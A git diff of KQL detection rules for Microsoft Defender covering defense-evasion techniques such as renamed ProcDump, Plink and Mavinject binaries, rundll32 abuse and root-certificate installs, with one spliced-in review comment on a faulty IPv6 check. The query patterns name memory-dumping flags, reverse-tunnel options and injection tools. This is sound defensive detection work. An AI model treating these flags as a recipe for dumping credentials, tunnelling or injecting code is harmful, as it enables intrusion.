+// Title: Renamed Mavinject.EXE Execution
+// Author: frack113, Florian Roth
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_megasync_execution.kql b/KQL/rules/Defense Evasion/renamed_megasync_execution.kql
index c9a77b0e..0cc57952 100644
--- a/KQL/rules/Defense Evasion/renamed_megasync_execution.kql
+++ b/KQL/rules/Defense Evasion/renamed_megasync_execution.kql
@@ -1,13 +1,13 @@
-// Title: Renamed MegaSync Execution
-// Author: Sittikorn S
-// Date: 2021-06-22
-// Level: high
-// Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Software that illegally integrates MegaSync in a renamed form
-// - Administrators that have renamed MegaSync
-
-DeviceProcessEvents
+// Title: Renamed MegaSync Execution
+// Author: Sittikorn S
+// Date: 2021-06-22
+// Level: high
+// Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Software that illegally integrates MegaSync in a renamed form
+// - Administrators that have renamed MegaSync
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "megasync.exe" and (not(FolderPath endswith "\\megasync.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql b/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql
index 9101be24..61cc55fb 100644
--- a/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql
+++ b/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed Microsoft Teams Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-07-12
-// Level: medium
-// Description: Detects the execution of a renamed Microsoft Teams binary.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Renamed Microsoft Teams Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-12
+// Level: medium
+// Description: Detects the execution of a renamed Microsoft Teams binary.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where (ProcessVersionInfoOriginalFileName in~ ("msteams.exe", "teams.exe")) and (not((FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\teams.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql b/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql
index 70447fb1..d632c721 100644
--- a/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql
+++ b/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql
@@ -1,12 +1,12 @@
-// Title: Renamed Msdt.EXE Execution
-// Author: pH-T (Nextron Systems)
-// Date: 2022-06-03
-// Level: high
-// Description: Detects the execution of a renamed "Msdt.exe" binary
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.003
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Renamed Msdt.EXE Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2022-06-03
+// Level: high
+// Description: Detects the execution of a renamed "Msdt.exe" binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "msdt.exe" and (not(FolderPath endswith "\\msdt.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql b/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql
index 154c5e14..97294b8a 100644
--- a/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql
+++ b/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed Office Binary Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-20
-// Level: high
-// Description: Detects the execution of a renamed office binary
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Renamed Office Binary Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-20
+// Level: high
+// Description: Detects the execution of a renamed office binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_plink_execution.kql b/KQL/rules/Defense Evasion/renamed_plink_execution.kql
index 9e8efea5..e60c660b 100644
--- a/KQL/rules/Defense Evasion/renamed_plink_execution.kql
+++ b/KQL/rules/Defense Evasion/renamed_plink_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed Plink Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-06
-// Level: high
-// Description: Detects the execution of a renamed version of the Plink binary
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-
-DeviceProcessEvents
+// Title: Renamed Plink Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-06
+// Level: high
+// Description: Detects the execution of a renamed version of the Plink binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
 | where (ProcessVersionInfoOriginalFileName =~ "Plink" or (ProcessCommandLine contains " -l forward" and ProcessCommandLine contains " -P " and ProcessCommandLine contains " -R ")) and (not(FolderPath endswith "\\plink.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_procdump_execution.kql b/KQL/rules/Defense Evasion/renamed_procdump_execution.kql
index d15ceab3..9bdba836 100644
--- a/KQL/rules/Defense Evasion/renamed_procdump_execution.kql
+++ b/KQL/rules/Defense Evasion/renamed_procdump_execution.kql
@@ -1,14 +1,14 @@
-// Title: Renamed ProcDump Execution
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-11-18
-// Level: high
-// Description: Detects the execution of a renamed ProcDump executable.
-// This often done by attackers or malware in order to evade defensive mechanisms.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.003
-// False Positives:
-// - Procdump illegally bundled with legitimate software.
-// - Administrators who rename binaries (should be investigated).
-
-DeviceProcessEvents
+// Title: Renamed ProcDump Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-11-18
+// Level: high
+// Description: Detects the execution of a renamed ProcDump executable.
+// This often done by attackers or malware in order to evade defensive mechanisms.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+// - Procdump illegally bundled with legitimate software.
+// - Administrators who rename binaries (should be investigated).
+
+DeviceProcessEvents
 | where (ProcessVersionInfoOriginalFileName =~ "procdump" or ((ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma " or ProcessCommandLine contains " –ma " or ProcessCommandLine contains " —ma " or ProcessCommandLine contains " ―ma " or ProcessCommandLine contains " -mp " or ProcessCommandLine contains " /mp " or ProcessCommandLine contains " –mp " or ProcessCommandLine contains " —mp " or ProcessCommandLine contains " ―mp ") and (ProcessCommandLine contains " -accepteula" or ProcessCommandLine contains " /accepteula" or ProcessCommandLine contains " –accepteula" or ProcessCommandLine contains " —accepteula" or ProcessCommandLine contains " ―accepteula"))) and (not((FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql b/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql
index 0fc7e3ce..759fc8db 100644
--- a/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql
+++ b/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed Remote Utilities RAT (RURAT) Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-19
-// Level: medium
-// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.collection, attack.command-and-control, attack.discovery, attack.s0592
-
-DeviceProcessEvents
+// Title: Renamed Remote Utilities RAT (RURAT) Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-19
+// Level: medium
+// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.collection, attack.command-and-control, attack.discovery, attack.s0592
+
+DeviceProcessEvents
 | where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql
index 83e9adf3..a4943872 100644
--- a/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql
+++ b/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql
@@ -1,12 +1,12 @@
-// Title: Response File Execution Via Odbcconf.EXE
-// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-22
-// Level: medium
-// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.008
-// False Positives:
-// - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary.
-
-DeviceProcessEvents
+// Title: Response File Execution Via Odbcconf.EXE
+// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") and ProcessCommandLine contains ".rsp"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql b/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql
index 6fae094c..97921781 100644
--- a/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql
+++ b/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql
@@ -1,12 +1,12 @@
-// Title: Root Certificate Installed From Susp Locations
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-09
-// Level: high
-// Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1553.004
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Root Certificate Installed From Susp Locations
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains ":\\Windows\\TEMP\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\") and (ProcessCommandLine contains "Import-Certificate" and ProcessCommandLine contains " -FilePath " and ProcessCommandLine contains "Cert:\\LocalMachine\\Root")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql b/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql
index 12d6b11e..899fd381 100644
--- a/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql
+++ b/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql
@@ -1,10 +1,10 @@
-// Title: Run PowerShell Script from ADS
-// Author: Sergey Soldatov, Kaspersky Lab, oscd.community
-// Date: 2019-10-30
-// Level: high
-// Description: Detects PowerShell script execution from Alternate Data Stream (ADS)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.004
-
-DeviceProcessEvents
+// Title: Run PowerShell Script from ADS
+// Author: Sergey Soldatov, Kaspersky Lab, oscd.community
+// Date: 2019-10-30
+// Level: high
+// Description: Detects PowerShell script execution from Alternate Data Stream (ADS)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Get-Content" and ProcessCommandLine contains "-Stream") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql b/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql
index fbaa2c0d..985461e4 100644
--- a/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql
+++ b/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql
@@ -1,10 +1,10 @@
-// Title: Run PowerShell Script from Redirected Input Stream
-// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community
-// Date: 2020-10-17
-// Level: high
-// Description: Detects PowerShell script execution via input stream redirect
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Run PowerShell Script from Redirected Input Stream
+// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community
+// Date: 2020-10-17
+// Level: high
+// Description: Detects PowerShell script execution via input stream redirect
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql b/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql
index 01708432..478a3349 100644
--- a/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql
+++ b/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql
@@ -1,10 +1,10 @@
-// Title: Rundll32 Execution With Uncommon DLL Extension
-// Author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou
-// Date: 2022-01-13
-// Level: medium
-// Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011
-
-DeviceProcessEvents
+// Title: Rundll32 Execution With Uncommon DLL Extension
+// Author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou
+// Date: 2022-01-13
+// Level: medium
+// Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (not((ProcessCommandLine =~ "" or ((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".cpl\"" or ProcessCommandLine contains ".cpl'" or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".dll'" or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf," or ProcessCommandLine contains ".inf\"" or ProcessCommandLine contains ".inf'") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".inf")) or ProcessCommandLine contains " -localserver " or isnull(ProcessCommandLine) or ((ProcessCommandLine contains ":\\Windows\\Installer\\" and ProcessCommandLine contains ".tmp" and ProcessCommandLine contains "zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))) and (not((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessCommandLine contains "\\EDGEMITMP_" and InitiatingProcessCommandLine contains ".tmp\\setup.exe" and InitiatingProcessCommandLine contains "--install-archive=" and InitiatingProcessCommandLine contains "--previous-version=" and InitiatingProcessCommandLine contains "--msedgewebview --verbose-logging --do-not-launch-msedge --user-level")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql b/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql
index fc1730b5..fd90afa2 100644
--- a/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql
+++ b/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql
@@ -1,12 +1,12 @@
-// Title: Rundll32 Execution Without CommandLine Parameters
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-05-27
-// Level: high
-// Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-// False Positives:
-// - Possible but rare
-
-DeviceProcessEvents
+// Title: Rundll32 Execution Without CommandLine Parameters
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-27
+// Level: high
+// Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - Possible but rare
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith "\\rundll32.exe" or ProcessCommandLine endswith "\\rundll32.exe\"" or ProcessCommandLine endswith "\\rundll32") and (not((InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Microsoft\\Edge\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql b/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql
index 2542ed68..d34e1e69 100644
--- a/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql
+++ b/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql
@@ -1,12 +1,12 @@
-// Title: Rundll32 InstallScreenSaver Execution
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec
-// Date: 2022-04-28
-// Level: medium
-// Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1218.011, attack.defense-evasion
-// False Positives:
-// - Legitimate installation of a new screensaver
-
-DeviceProcessEvents
+// Title: Rundll32 InstallScreenSaver Execution
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec
+// Date: 2022-04-28
+// Level: medium
+// Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218.011, attack.defense-evasion
+// False Positives:
+// - Legitimate installation of a new screensaver
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "InstallScreenSaver" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_internet_connection.kql b/KQL/rules/Defense Evasion/rundll32_internet_connection.kql
index 330ad0cd..ba46f5e8 100644
--- a/KQL/rules/Defense Evasion/rundll32_internet_connection.kql
+++ b/KQL/rules/Defense Evasion/rundll32_internet_connection.kql
@@ -1,12 +1,12 @@
-// Title: Rundll32 Internet Connection
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-11-04
-// Level: medium
-// Description: Detects a rundll32 that communicates with public IP addresses
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011, attack.execution
-// False Positives:
-// - Communication to other corporate systems that use IP addresses from public address spaces
-
-DeviceNetworkEvents
+// Title: Rundll32 Internet Connection
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-11-04
+// Level: medium
+// Description: Detects a rundll32 that communicates with public IP addresses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, attack.execution
+// False Positives:
+// - Communication to other corporate systems that use IP addresses from public address spaces
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql b/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql
index ab0ec4f3..318cee1b 100644
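Review bot: The three IPv6 exclusions (`"::1/128"`, `"fe80::/10"`, `"fc00::/7"`) in the `not(...)` clause are passed to `ipv4_is_in_range`, which is documented to return null when an address or CIDR does not parse as IPv4; in Kusto `false or null` stays null, and a null `where` predicate drops the row whether `not(null)` yields null or false, so every rundll32 connection to a public IPv4 address that misses the IPv4 and Azure exclusions is discarded and the regenerated rule never fires. Replace those three terms with `ipv6_is_in_range(RemoteIP, "::1/128") or ipv6_is_in_range(RemoteIP, "fe80::/10") or ipv6_is_in_range(RemoteIP, "fc00::/7")` (the ipv6_* functions accept IPv4 input as well), or wrap each range check in `coalesce(..., false)`. The `20.0.0.0/8` and `51.103-51.105.0.0/16` exclusions are broad enough to hide C2 hosted in Azure; a header comment stating that trade-off would help whoever tunes this.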
--- a/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql
+++ b/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql
@@ -1,10 +1,10 @@
-// Title: Rundll32 Spawned Via Explorer.EXE
-// Author: CD_ROM_
-// Date: 2022-05-21
-// Level: medium
-// Description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Rundll32 Spawned Via Explorer.EXE
+// Author: CD_ROM_
+// Date: 2022-05-21
+// Level: medium
+// Description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe") and (not((ProcessCommandLine contains " C:\\Windows\\System32\\" or ProcessCommandLine endswith " -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql b/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql
index 9a627673..37f35119 100644
--- a/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql
+++ b/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql
@@ -1,10 +1,10 @@
-// Title: RunDLL32 Spawning Explorer
-// Author: elhoim, CD_ROM_
-// Date: 2022-04-27
-// Level: high
-// Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011
-
-DeviceProcessEvents
+// Title: RunDLL32 Spawning Explorer
+// Author: elhoim, CD_ROM_
+// Date: 2022-04-27
+// Level: high
+// Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not(InitiatingProcessCommandLine contains "\\shell32.dll,Control_RunDLL"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql b/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql
index a3ae7d5a..07ea6d5e 100644
--- a/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql
+++ b/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql
@@ -1,12 +1,12 @@
-// Title: Rundll32 UNC Path Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-10
-// Level: high
-// Description: Detects rundll32 execution where the DLL is located on a remote location (share)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.lateral-movement, attack.t1021.002, attack.t1218.011
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Rundll32 UNC Path Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects rundll32 execution where the DLL is located on a remote location (share)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.lateral-movement, attack.t1021.002, attack.t1218.011
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql b/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql
index 982770ca..a2c6dfe5 100644
--- a/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql
+++ b/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql
@@ -1,12 +1,12 @@
-// Title: RunMRU Registry Key Deletion
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-09-25
-// Level: high
-// Description: Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog.
-// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
-// Adversaries may delete this key to cover their tracks after executing commands.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.003
-
-DeviceProcessEvents
+// Title: RunMRU Registry Key Deletion
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-25
+// Level: high
+// Description: Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog.
+// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
+// Adversaries may delete this key to cover their tracks after executing commands.
